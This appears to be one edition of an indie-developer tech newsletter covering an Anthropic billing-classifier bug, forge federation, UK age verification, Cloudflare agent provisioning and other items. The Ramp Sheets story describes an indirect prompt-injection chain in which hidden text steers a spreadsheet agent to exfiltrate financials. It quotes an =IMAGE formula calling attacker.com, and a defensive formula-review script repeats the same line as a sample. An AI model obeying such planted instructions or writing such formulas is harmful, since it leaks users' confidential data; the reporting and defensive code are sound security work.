Anthropic just billed Claude Code users $200 because the string HERMES.md sat in their git history. Not a real file, just text in a recent commit message, and an anti-abuse classifier silently rerouted their requests off the Max plan onto pay-as-you-go billing. Reporter sasha-id watched $200.98 bleed out while 86% of his $200/month Max 20x plan sat untouched.
Anthropic refused refunds until HN hit 1,031 points, then reversed course and refunded everyone plus $200 in credits. The class of bug stays as long as Anthropic keeps enforcing its April 4 anti-third-party-harness crackdown with a keyword classifier on your prompt.
In today’s indie hacker news:
- Anthropic billed $200 for the string HERMES.md in commit messages
- Tangled raised €3.8M from the ex-GitHub CEO to federate forges
- A UK hamster forum got a £2,400 ID-verification bill
- Ramp Sheets AI leaked CFO data via white-on-white CSV instructions
- Cloudflare agents can now buy domains and ship code with no dashboard
TOP STORIES
BILLED FOR A STRING
Anthropic billed Claude Code users $200 for HERMES.md in commit messages

The story: sasha-id filed issue #53262 on the Claude Code repo: $200.98 in extra usage credits had drained from his account while 86% of his $200/month Max 20x plan sat untouched. The trigger was the case-sensitive string HERMES.md in recent git commit messages. Anthropic’s anti-abuse classifier reads your system prompt (which includes recent git history), matched the string, and silently rerouted his requests onto pay-as-you-go billing. Head of Claude Code bcherny closed the issue with “This was an overactive anti-abuse system. Fixed.” Anthropic refused refunds until HN hit 1,031 points and 441 comments. Then it reversed course and refunded everyone plus $200 in credits, confirmed by Nous Research’s Teknium.
The details:
- Strictly case-sensitive: HERMES.md fails; hermes.md works; HERMES.txt works; AGENTS.md works fine.
- HERMES.md is the spec convention used by Hermes Agent, Nous Research’s open-source autonomous AI agent, the same way Claude Code uses CLAUDE.md.
- Root cause: Anthropic’s April 4 anti-harness rule blocks Pro and Max subscribers from routing flat-rate quota through third-party agents. The classifier was a false-positive trip-wire. Theo: “It is genuinely insane that Anthropic will bill you differently if you mention certain words in your prompt.” @ThePrimeagen was less polite.
Why builders care: If you ever committed a HERMES.md or had a collaborator do it, your Claude Code requests were silently rerouted with no warning and no diagnosis path. The fix landed; the class of bug stays. Anthropic is running a server-side keyword classifier on your git history, and the first instinct was to keep the money. (Speaking of devs walking off, see Tangled’s pitch up next.)
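A quick way to find out whether your own history ever carried the trigger string, as an added example (not Anthropic's classifier and not Claude Code's own code). The story says Claude Code's system prompt includes recent git history and that the match on HERMES.md was exact-case, so the scan below reads the same text with the same case-sensitive substring rule. Only HERMES.md is known from the story; the triggers list is an assumption you extend yourself, and the sample commits in the usage are constructed.

```python
"""Find commits whose messages carry a string a prompt-side classifier may match.

Added example, not Anthropic's classifier and not Claude Code's own code. The
story says Claude Code's system prompt includes recent git history and the
anti-abuse match on HERMES.md was exact-case; this scans the same text so you
can spot the commits before, not after, the bill. Only HERMES.md is known from
the story; the triggers argument is an assumption you extend yourself.
"""
import subprocess

DEFAULT_TRIGGERS = ("HERMES.md",)   # exact case, as reported in the issue thread


def find_triggers(commits, triggers=DEFAULT_TRIGGERS):
    """Return [(commit_id, trigger)] for messages containing a trigger verbatim.

    Case-sensitive substring match, mirroring the reported behaviour:
    hermes.md, HERMES.txt and AGENTS.md do not match HERMES.md.
    """
    return [(cid, t) for cid, msg in commits for t in triggers if t in msg]


def git_commits(repo=".", count=50):
    """Recent (hash, full message) pairs from git log, newest first.

    %x00 and %x1e are git's hex-byte format placeholders, giving unambiguous
    field and record separators even for multi-line commit messages.
    """
    out = subprocess.run(
        ["git", "-C", repo, "log", f"-n{count}", "--format=%H%x00%B%x1e"],
        check=True, capture_output=True, text=True,
    ).stdout
    commits = []
    for rec in out.split("\x1e"):
        rec = rec.strip("\n")
        if rec:
            cid, msg = rec.split("\x00", 1)
            commits.append((cid, msg.rstrip("\n")))
    return commits


if __name__ == "__main__":
    import sys
    # Constructed sample; replace with git_commits(path) to scan a real repo.
    sample = [
        ("a1b2c3d4", "Add HERMES.md so Hermes Agent can read the harness spec"),
        ("e5f6a7b8", "Rename hermes.md to HERMES.txt"),
        ("c9d0e1f2", "Update AGENTS.md"),
    ]
    commits = git_commits(sys.argv[1]) if len(sys.argv) > 1 else sample
    for cid, trigger in find_triggers(commits):
        print(f"{cid[:12]}  contains {trigger!r}")
```

Run it with a repo path to scan the last 50 commits of real history; with no argument it runs over the constructed sample and reports only the first commit. Note that this covers commit messages only, which is the text the story says reached the classifier; a file named HERMES.md in the working tree shows up in `git ls-files`, not here.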
Work from any WiFi like it's your home network. NordVPN's Meshnet runs a free private mesh between your laptop, dev box, and home server. SSH from a café without exposing a port, the way you'd use Tailscale. The paid VPN on top lets you test geo-fenced Stripe checkouts or feature flags from any country.
We get a cut if you sign up. Only added for tools we use ourselves.
FORK GITHUB
Tangled raised €3.8M from the ex-GitHub CEO to federate forges

The story: Anirudh Oppiliappan shipped a manifesto for federated git forges: roughly 90% of the world’s open-source software depends on one provider, and Tangled wants to fix that. It’s a direct follow-up to Mitchell Hashimoto’s Ghostty exit from GitHub (Edition #28). Tangled’s bet: git for code transfer plus AT Protocol (Bluesky’s stack) for identity and metadata, sidestepping ForgeFed’s ActivityPub-based defederation drama. Tangled raised €3.8M ($4.5M) seed in March 2026 led by byFounders, with angels including Thomas Dohmke (ex-GitHub CEO), Avery Pennarun (Tailscale CEO), and Mårten Mickos.
The details:
- AT Protocol was chosen over ActivityPub to dodge Mastodon-style defederation politics. Data lives on user-owned servers; apps aggregate via firehose.
- Self-hosted servers are called “Knots.” Lightweight, runs on a Raspberry Pi, multi-tenant if you want.
- Codeberg is the comparison point: 200,000+ users and 300,000+ repos. The HN post hit 532 points and 338 comments in 14 hours.
Why builders care: Self-host a Knot on a VPS or Pi and you keep data sovereignty while doing PRs across any other Tangled server. The contrarian HN take: most devs won’t self-host, a dominant aggregator emerges anyway, and the monoculture moves up the stack. Either way, it’s the only VC-backed GitHub alternative with the ex-GitHub CEO on the cap table.
ID OR DARK
A UK hamster forum got a £2,400 ID-verification bill

The story: Glenn Meder’s X thread hit 824 HN points and 519 comments by morning: age verification turns identity checks into a precondition for reading, posting, or watching anything online. The UK Online Safety Act enforces it now. Ofcom has 90+ open investigations, 6 fines so far, and a £18M-or-10%-of-turnover ceiling. Collateral: The Hamster Forum got a £2,400/year quote for external age verification. LFGSS (an 18-year-old cycling forum) shut down. Microcosm deleted ~300 communities serving 275,000 monthly users in one day. Gaming on Linux, Hexus (310K users), and a 500K-post green-living forum followed.
The details:
- Dreamwidth blocked all Mississippi IPs over the state’s $10,000-per-user-per-incident fines, calling them “an existential threat.” Bluesky followed. Pornhub geo-blocked 23 US states.
- Veriff: $1.39 per check, plans from $49/month. Persona starts at $250/month. EFF: the laws “concentrate and consolidate power in the hands of the largest companies.”
- US state stack: Utah (May 2026), Texas (Jan 2026, injunction Dec 23 2025), Louisiana (July 2026), California (Jan 2027). All require app-store verification with parental consent.
Why builders care: Every indie operator in the UK, US, or EU faces a binary now: spend $250-2,400+/month on identity infrastructure or geo-block entire states. The per-user-per-incident fine structure means one bad-faith enforcement is existential for small operators. Pornhub can swallow a 23-state geo-block. A hamster forum can’t.
WHITE TEXT, BLACK HAT
Ramp Sheets AI exfiltrated CFO financials via hidden CSV instructions

The story: PromptArmor disclosed a 6-step prompt-injection chain against Ramp Sheets AI, the agentic spreadsheet used by KKR, Thrive Capital, and General Catalyst for financial modeling. Hidden white-on-white text inside an externally sourced dataset (CSV, shared Drive file, email attachment) tells the agent to copy data from the user’s confidential Financial Model and insert an =IMAGE() formula. When the cell renders, financials append as query parameters to an attacker-controlled URL. Zero user approval prompts. Disclosure February 19; Ramp confirmed receipt 24 days later. Fix shipped March 16. Anthropic’s Claude for Excel ships a red-warning interstitial that displays full formulas before any external-network formula renders. Ramp’s mitigation was undisclosed.
The details:
- Exact formula: =IMAGE("https://attacker.com/visualize.png?{victim_sensitive_financial_data}"). Data inserted as a query parameter, transmitted on cell render.
- PromptArmor’s prior named-brand exploits: Slack AI, Notion AI, Superhuman, GitHub Copilot CLI, IBM “Bob,” HuggingFace Chat, Google Antigravity, vLex.
- OWASP ranks indirect prompt injection #1 LLM risk for 2026. Cisco: 83% of orgs plan agentic AI deployment, only 29% feel ready to secure it.
Why builders care: If your agent can write any formula, cell value, or markup that triggers an outbound network call, an attacker who lands one poisoned file in your user’s workflow has a silent exfiltration channel. The fix is not exotic: gate external-network formulas behind explicit user review (the exact UI Anthropic shipped). The deeper miss is treating untrusted input as inert data rather than as a possible carrier of adversarial instructions.
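What that review gate looks like in code, as an added example that is not Ramp's or PromptArmor's code: every formula an agent proposes is inspected before it is written, anything that would make a request when the cell renders is held for the user, and the specific shape of the Ramp chain (a network-capable formula that also pulls in cell contents) is called out separately. The set of network-capable function names is an assumption covering common Sheets/Excel functions, and the sample proposals in the usage are constructed.

```python
"""Hold spreadsheet formulas that can reach the network until a human reviews them.

Added example, not Ramp's or PromptArmor's code. It implements the mitigation
described in the story: an agent proposes formulas, and anything that would make
an outbound request when the cell renders is held for explicit user review
instead of being written silently. NETWORK_FUNCTIONS is an assumption covering
common Sheets/Excel functions; extend it for your dialect.
"""
import re
from dataclasses import dataclass, field

# Assumption: functions that fetch a URL or another document at render time.
NETWORK_FUNCTIONS = {
    "IMAGE", "IMPORTDATA", "IMPORTXML", "IMPORTHTML", "IMPORTFEED",
    "IMPORTRANGE", "WEBSERVICE", "HYPERLINK",
}

_STR_RE = re.compile(r'"(?:[^"]|"")*"')            # "..." literals; "" is an escaped quote
_FUNC_RE = re.compile(r"\b([A-Z][A-Z0-9_.]*)\s*\(", re.IGNORECASE)
_URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# A1-style refs: optionally absolute ($A$1), sheet-qualified (Model!B2), or ranges.
_REF_RE = re.compile(
    r"(?<![A-Za-z0-9_])(?:'[^']+'!|[A-Za-z0-9_]+!)?"
    r"\$?[A-Z]{1,3}\$?\d+(?::\$?[A-Z]{1,3}\$?\d+)?(?![A-Za-z0-9_])",
    re.IGNORECASE,
)


@dataclass
class Verdict:
    formula: str
    network_functions: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    referenced_cells: list = field(default_factory=list)

    @property
    def needs_review(self) -> bool:
        """Anything that can trigger a request must be shown to the user first."""
        return bool(self.network_functions or self.urls)

    @property
    def exfil_risk(self) -> bool:
        """Network-capable and pulling in cell contents: the Ramp chain's shape."""
        return self.needs_review and bool(self.referenced_cells)


def inspect_formula(formula: str) -> Verdict:
    v = Verdict(formula=formula)
    if not formula.startswith("="):
        return v                                   # a plain value renders nothing
    body = formula[1:]
    # URLs only matter inside string literals; collect them there.
    for lit in _STR_RE.findall(body):
        v.urls.extend(_URL_RE.findall(lit.strip('"')))
    # Strip literals before looking for functions and refs, so text inside a
    # string (a URL path, a fake "IMAGE(") can neither spoof nor hide anything.
    nostr = _STR_RE.sub('""', body)
    funcs = {m.group(1).upper() for m in _FUNC_RE.finditer(nostr)}
    v.network_functions = sorted(funcs & NETWORK_FUNCTIONS)
    # Drop function names too, so LOG10( is not mistaken for a reference.
    stripped = _FUNC_RE.sub("(", nostr)
    v.referenced_cells = sorted({m.group(0) for m in _REF_RE.finditer(stripped)})
    return v


def gate(proposed: list) -> tuple:
    """Split agent-proposed formulas into (auto_apply, hold_for_review)."""
    auto, held = [], []
    for f in proposed:
        v = inspect_formula(f)
        (held if v.needs_review else auto).append(v)
    return auto, held


if __name__ == "__main__":
    # Constructed sample of what a poisoned dataset might steer an agent to write.
    proposals = [
        "=SUM(Model!B2:B13)",
        '=IMAGE("https://attacker.com/visualize.png?d="&Model!B2&"|"&Model!B3)',
        "=IMAGE(C1)",                  # URL lives in a cell the attacker controls
    ]
    auto, held = gate(proposals)
    print(f"auto-applied: {[v.formula for v in auto]}")
    for v in held:
        tag = "EXFIL RISK" if v.exfil_risk else "review"
        print(f"[{tag}] {v.formula} -> {v.network_functions} {v.urls} {v.referenced_cells}")
```

The held list is what the interstitial shows the user, formula in full, before anything renders. Two design points matter: string literals are stripped before scanning, so an attacker cannot hide a network function inside quotes or plant fake references in a URL path, and a formula like =IMAGE(C1) is still flagged even though no URL is visible, because the URL can be supplied from a cell the poisoned file also controls.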
AGENTS BUY DOMAINS
Cloudflare agents can now create accounts, buy domains, and deploy

The story: Cloudflare shipped agent-driven provisioning in open beta during Agents Week. One command, stripe projects init, and an agent can spin up a paid Cloudflare account, register a domain, get an API token, and deploy code. The whole flow runs without a dashboard, an OAuth handoff, or a credit-card form. Stripe acts as the “Orchestrator,” attesting identity and passing payment tokens (not raw card data) to Cloudflare. Default cap: $100/month per provider, configurable via Budget Alerts. The companion Cloudflare Registrar API is also in beta: agents register domains at cost (no markup) with WHOIS privacy free by default; the spec requires confirming name and price with the user before registering, since registrations are non-refundable.
The details:
- Built on OAuth + OIDC + payment tokenization. Any platform with signed-in users can implement the Orchestrator pattern.
- Cloudflare’s MCP server includes the Registrar API natively, so Cursor and Claude Code get domain registration with no extra config.
- $100,000 in Cloudflare credits for new Stripe Atlas startups bundled into the launch. Cloudflare and GoDaddy partnered April 7 on Agent Name Service and Web Bot Auth open standards (GoDaddy is a co-author here, not a casualty).
Why builders care: An agent can now go zero-to-deployed-app on a real domain in one automated flow. The $100/month cap and the user-approval checkpoint before domain purchase mean you can wire this into a product without runaway-spend worry. HN skepticism: nothing prevents a compromised agent from exfiltrating its API keys, and Stripe-as-gatekeeper isn’t an open standard yet. Use it for greenfield agent flows, not production where the agent runs unsupervised.
TRENDING TODAY
🚫 The Zig project’s rationale for banning AI contributions. Zig’s code of conduct now prohibits LLM-generated issues, PRs, and bug tracker comments. VP of Community Loris Cro: “you play the person, not the cards…you bet on the contributor, not on the contents of their first PR.” Direct cost: Bun (Anthropic-owned) won’t upstream its perf improvements because of the ban. The clearest anti-AI line in open source, and it’s already costing them patches.
👹 “Where the Goblins Came From”. OpenAI shipped a post-mortem on why GPT-5.1+ obsessively used goblin, gremlin, raccoon, and troll metaphors. “Goblin” usage in ChatGPT spiked 175% post-GPT-5.1. Root cause: human raters in RLHF over-rewarded creature metaphors under a “nerdy personality” condition; the bias transferred across the model family. Fix: a system-prompt patch banning the words. Rare public window into RLHF personality drift baked in at scale.
🔓 732 bytes to root on every major Linux distribution. CVE-2026-31431 is a kernel crypto bug (authencesn template plus AF_ALG AEAD) that lets any unprivileged local user own root on every major distro shipped since 2017. Confirmed on Ubuntu 24.04 LTS, RHEL 10.1, SUSE 16, Amazon Linux 2023. Patch in mainline at commit a664bf3d603d. If you run a SaaS on unpatched Linux, update now.
FIRST DOLLAR
AI WITH A PURSE
An AI agent landed its first €8.26 selling Claude skills
Claude (from100to200) just landed its first sale on day 3 of a doubling experiment. A Finnish operator (GitHub: pieterterberg) handed Claude €100 and one rule: turn it into €200, then €400, then €800, faster every doubling. The first product is a 20-skill Claude agent pack on Polar at €9.99 (2 free on GitHub). Net €8.26 after VAT and merchant-of-record cut. The buyer was Dutch, driven by a single LinkedIn post on the human’s account. The AI is the protagonist, not the tool, and the public ledger is on from100to200.com.
SATURDAY ORGANIZER
$3,200/month organizing other people’s filing systems
u/Fit_Average8352 in Halifax is 4 months into a B2B physical-organizing service for small businesses. $400/session, Saturdays plus 2 evenings. 8 clients, 5 of 8 rebooked, all 3 new clients this month came from word of mouth. Day job pays $4,800/month; the side business is at 67% of that. Top commenter (u/CorpEscapeArtist) flags the rebook rate plus word-of-mouth as an underpriced signal and says raise to $500-550 before quitting. The work he loves more than his day job is the simplest possible service business: showing up and organizing other people’s chaos.
STACK OF THE DAY
🦊 adblock-rust Manager - Firefox extension that flips on the Brave adblock-rust engine bundled-but-disabled in Firefox 149 (Edition #24). Two about:config flags gate it; the extension wraps both with a one-click ETP toggle and a guided setup wizard. Ships with 8 preset filter lists (EasyList, EasyPrivacy, AdGuard). MPL-2.0, 37 stars, v1.0.0 dropped April 29. Honest HN take: little real-world difference vs ETP plus uBlock Origin, and YouTube ads still slip past.
Not sponsored. We just feature tools builders would actually use.
BOOKMARKED TODAY
📡 FastCGI is still the better protocol for reverse proxies - Andrew Ayer argues FastCGI’s worker model still beats HTTP-over-localhost 30 years on. 276 HN points, 67 comments. Worth reading if you maintain an nginx config and have wondered why unix sockets still feel hacky.
💸 Parallel Web Systems hits $2B valuation 5 months after the last raise - $100M Series B led by Sequoia (not ICONIQ; that was the November Series A). Total raised: $230M. Parag Agrawal’s bet is that agents will hit the web 1,000x more than humans, and he’s already selling the pipes. Customers include Clay, Harvey, Notion, Opendoor.
📚 Finetuning activates verbatim recall of copyrighted books in LLMs - Stony Brook plus Columbia Law researchers show finetuning on an author’s works activates 85-90% verbatim recall of held-out copyrighted books across GPT-4o, Gemini-2.5-Pro, and DeepSeek-V3.1. Single spans over 460 words, semantic prompts only. Finetuning on Murakami alone surfaces recall of 30+ unrelated authors. Undercuts the labs’ defense that RLHF and output filters block regurgitation.
Curated by AI, built by a human.